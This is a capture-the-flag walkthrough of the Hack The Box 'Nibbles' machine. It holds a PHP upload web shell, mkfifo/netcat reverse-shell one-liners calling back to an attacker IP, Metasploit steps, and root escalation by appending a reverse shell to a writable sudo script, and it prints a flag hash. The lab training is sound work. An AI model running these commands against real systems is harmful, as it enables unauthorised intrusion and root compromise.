Nibbles

Overview

Remember that enumeration is an iterative process. After performing our Nmap port scans, make sure to perform detailed enumeration against all open ports based on what is running on the discovered ports. Follow the same process as we did with Nibbles:

  • Enumeration/Scanning with Nmap - perform a quick scan for open ports followed by a full port scan

  • Web Footprinting - check any identified web ports for running web applications, and any hidden files/directories. Some useful tools for this phase include whatweb and Gobuster

  • If you identify the website URL, you can add it to your '/etc/hosts' file with the IP you get in the question below to load it normally, though this is unnecessary.

  • After identifying the technologies in use, use a tool such as Searchsploit to find public exploits or search on Google for manual exploitation techniques

  • After gaining an initial foothold, use the Python3 pty trick to upgrade to a pseudo TTY

  • Perform manual and automated enumeration of the file system, looking for misconfigurations, services with known vulnerabilities, and sensitive data in cleartext such as credentials

  • Organize this data offline to determine the various ways to escalate privileges to root on this target

There are two ways to gain a foothold—one using Metasploit and one via a manual process. Challenge ourselves to work through and gain an understanding of both methods.

There are two ways to escalate privileges to root on the target after obtaining a foothold. Make use of helper scripts such as LinEnum and LinPEAS to assist you. Filter through the information searching for two well-known privilege escalation techniques.

Hacking the Box

Check website first on firefox

Check the source code and discovered that in the comments they make reference to a directory named /nibbleblog/

Scan the network with nmap

Use gobuster to see what other extensions exist

Work through the different directories

The /admin.php is a login page. The source code doesn't reveal anything.

Check the /content directory and in the in /content/private/users.xml they mention that one of the users is admin

Checking the /content/private/config.xml they make reference to nibbles a lot which coincidently is the password for the admin account.

Signing into the /admin.php with the credentials above gives a bit more access.

Under the Plugins tab, go to the My Image plugin to upload .php file.

<?php system('id'); ?>

Create a new .php file with the code above. This code tests for code execution.

Upload the file and save changes. You'll get a bunch of errors but it looks like the code successfully uploaded.

We need to figure out where the file got uploaded.

In the /content directory there is a plugins directory and another sub-directory for my_image.

http://<host>/nibbleblog/content/private/plugins/my_image/

Attempt to gain command execution on server by using curl with image.php:

curl http://10.129.42.190/nibbleblog/content/private/plugins/my_image/image.php

uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)

If you get the following back then you have gained remote code execution:

uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)

Next is to modify the php file to obtain a reverse shell. Use the following BASH reverse shell one-liner and add it to the PHP script:

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ATTACKING_IP] [LISTENING_PORT] >/tmp/f"); ?>

We'll upload the file again to the website similar to the above and then we'll start a netcat listener.

nc -lvnp 9443

cURL the image page again (similar to above) or browse to it in Firefox at: http://nibbleblog/content/private/plugins/my_image/image.php to execute the reverse shell

It worked better when I used cURL. This should give you reverse access.

Before we move forward with additional enumeration, let us upgrade our shell to a "nicer" shell since the shell that we caught is not a fully interactive TTY and specific commands such as su will not work, we cannot use text editors, tab-completion does not work, etc. Use the link below to learn how to fully upgrade your reverse shell to a fully interactive TTY.

We will use a Python one-liner to spawn a pseudo-terminal so commands such as su and sudo will work.

python3 -c 'import pty; pty.spawn("/bin/bash")'

This will give you a more interactive terminal access.

Redirect to the file location for access to the user.txt flag:

/home/nibbler

79c03865431abf47b90ef24b9695e148

METASPLOIT ALTERNATIVE to gaining access

Start msfconsole on your host machine.

Search for an exploit for nibbleblog

search nibbleblog

Type:

use 0

To load the exploit.

Check the options and set the RHOST to the TARGET_IP and LHOST to HOST_IP (tun0 address).

Set the USERNAME and PASSWORD options as admin:nibbles

Set the TARGETURI to nibbleblog

Next is to change the payload type. We will use a generic payload for reverse tcp connection:

generic/shell_reverse_tcp

Once the payload is complete you will have terminal access to the nibbler account.

Next is to escalate priveleges.

Start by unzipping the personal.zip file in /home/nibblerand see a file called monitor.sh

unzip personal.zip

The shell script monitor.sh is a monitoring script, and it is owned by our nibbler user and writeable. cat the file to preview:

cat monitor.sh

Let us put this aside for now and pull in LinEnum.sh to perform some automated privilege escalation checks. First, download the script to your local attack VM or the Pwnbox.

Start by making a directory in your specified file location called linenum and cd into it. Run this command from there to download the .sh file.

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Then start a Python HTTP server using the command sudo python3 -m http.server 8080. On your host machine in the directory with the linenum.sh file.

sudo python3 -m http.server 8080

On target machine:

wget http://[HOST_IP]:8080/LinEnum.sh

On target machine change the permissions for the file to be executable.

chmod +x LinEnum.sh

Run the shell file on the target machine and wait for it to resolve. this will take a while:

./LinEnum.sh

The nibbler user can run the file /home/nibbler/personal/stuff/monitor.sh with root privileges. Being that we have full control over that file, if we append a reverse shell one-liner to the end of it and execute with sudo we should get a reverse shell back as the root user. Let us edit the monitor.sh file to append a reverse shell one-liner.

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [HOST_IP] 8443 >/tmp/f' | tee -a monitor.sh

If we cat the monitor.sh file, we will see the contents appended to the end. It is crucial if we ever encounter a situation where we can leverage a writeable file for privilege escalation. We only append to the end of the file (after making a backup copy of the file) to avoid overwriting it and causing a disruption.

Start a new netcat listener on another terminal:

nc -lvnp 8443

Execute the script with sudo:

sudo /home/nibbler/personal/stuff/monitor.sh

You should now have root priveleges on your listening terminal. Redirect to /root/root.txt for the final flag.

PreviousEasy MachinesNextStocker

Last updated